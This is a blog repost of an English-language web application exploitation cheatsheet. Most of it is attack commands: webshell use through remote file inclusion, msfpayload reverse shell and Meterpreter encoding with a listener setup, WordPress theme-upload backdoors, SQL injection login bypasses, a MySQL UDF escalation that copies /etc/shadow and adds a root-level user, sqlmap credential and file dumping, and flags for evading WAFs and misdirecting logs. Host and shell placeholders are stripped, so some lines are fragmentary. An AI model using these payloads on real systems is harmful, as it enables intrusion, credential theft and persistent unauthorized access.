martes, 17 de junio de 2014

Web Application exploitation - a cheatsheet (ingles)

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

[Last edited:2013-06-18]

 WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>

or

Example usage via Remote File Include (RFI):
http:///index.php?cmd=&page=http:///cmd.php
Null Bytes (‰00 - html code ampersand, hash 137, 00) may also assist in some cases:
http:///index.php?cmd=&page=http:///cmd.php

e.g.
http:///index.php?system=../../../../../etc/passwd.html
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
------
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 
set LPORT 
exploit


 http://stackoverflow.com/questions/3115559/exploitable-php-functions


------------------------------------------------------------------------------------------------------------------
Encoding and Decoding - for backdoors, injection, and (de)obfustication
http://www.asciitohex.com/
http://home.paulschou.net/tools/xlate/
http://www.idea2ic.com/PlayWithJavascript/hexToAscii.html

Burp Suite (Decoder module)
http://portswigger.net/burp/help/decoder.html

Decode base64 standard input 
base64 -d 
 
^D

Javascript deobfustication
http://www.javascriptbeautifier.com/
http://jsbeautifier.org/
http://vitzo.com/en/tools/javascript/javascript-beautifier

------------------------------------------------------------------------------------------------------------------
Specific Web applications
Joomla
Joomla default database configuration filename
/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u
/pentest/enumeration/web/cms-explorer  -url  -type joomla

WordPress
WordPress default database configuration filename

WordPress default login page
/wp-login.php
WordPress plugins
/wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url ; --proxy -enumerate [u|p|v|t] 

/pentest/enumeration/web/cms-explorer  -url  -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators i.e. you:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php

zip -r wpx.zip wpx
upload wpx.zip via web interface as an installed theme
Command execution access is via: 
/wp-content/plugins/wpx/cmd.php?cmd= 
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)

Cacti
Cacti default database configuration filename
/include/config.php


DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
/inc/mysql.php

Drupal
Drupal default database configuration filename
/sites/default/settings.php

Scanning Drupal for plugins and versions
/pentest/enumeration/web/cms-explorer  -url  -type drupal
PHPMyAdmin
/phpmyadmin/changelog.php
Timeclock
Timeclock default database configuration filename
/db.php


Default files to check for additional paths
lt;target-webpath>/robots.txt
lt;target-webpath>/style.css

------------------------------------------------------------------------------------------------------------------
SQL Terminators/Comments
MSSQL and MySQL:
;--
MySQL:
;#


Login Pages Basic SQL injection 
MS IIS
' OR '1=1';--

MySQL
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1;#

Enumerate number of columns/fields
...UNION SELECT 1;--
...UNION SELECT 1,2;--
...UNION SELECT 1,2,3;--

 Load file by injecting into the vulnerable field - encode string if necessary
…UNION ALL SELECT NULL,LOAD_FILE(‘’),NULL,NULL;-- …UNION ALL SELECT NULL,LOAD_FILE(‘’),NULL,NULL INTO OUTFILE ‘’;--

Dump/Write to file
(see encode text/shell to hex, base64)
...SELECT * FROM mytable INTO DUMPFILE ’; —
...SELECT * FROM mytable INTO OUTFILE ‘’; —

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku

MySQL <5 .0="" defined="" functions="" span="" user="">
command execution and privilege escalation with mysql running as root/SYSTEM
mysql> use mysql;
mysql> create table (line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into  values(load_file('');
Query OK, 1 rows affected (0.00 sec)
mysql> select * from  into dumpfile '/usr/lib/lib_mysqludf_sys.so';
Query OK, 1 rows affected (0.00 sec)
mysql> create function returns int soname 'lib_mysqludf_sys.so';
Example command execution with the new function:
mysql> set @status := ('cat /etc/shadow > /tmp/shadow');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('echo : | /usr/sbin/chpasswd');
Query OK, 0 rows affected (0.06 sec)
or
mysql> select ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>');
+----------------------------------------------------------------------------------------------------------------------------------------------------------+
('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>'); |+----------------------------------------------------------------------------------------------------------------------------------------------------------+
| 4294967296                                                                                                                                       | +----------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (1.70 sec)
SQLMap commands


cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" -p --banner --current-db --current-user --is-dba

Enumerate User Passwords
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --passwords

List of Databases
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dbs

Retrieve tables from specific Database
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --tables -D

Dump specific table contents
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dump -D -T

Retrieve system /etc/password file
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/passwd

Retrieve apache2 configuration file to identify live website config files
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/apache2.conf

Retrieve default configuration file to subsequently identify Document Root (web directory location)
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/sites-enabled/000-default

Retrieve CMS/Web app default configuration file if possible
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=//


 Other interesting flags:
--check-waf         Check for existence of WAF/IPS/IDS protection - implementation of nmap http-waf-detect nse script
Some logfile Misdirection flags:
--random-agent      Use randomly selected HTTP User-Agent header
--safe-url=   Url address to visit frequently during testing
--safe-freq=  Test requests between two visits to a given safe url
--mobile            Imitate smartphone through HTTP User-Agent header

 ------------------------------------------------------------------------------------------------------------------

Basic Client-side attacks
XSS - iframe



XSS - javascript




 References and sources also include:
http://g0tmi1k.blogspot.com
http://ha.ckers.org/sqlinjection/

Fuente: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)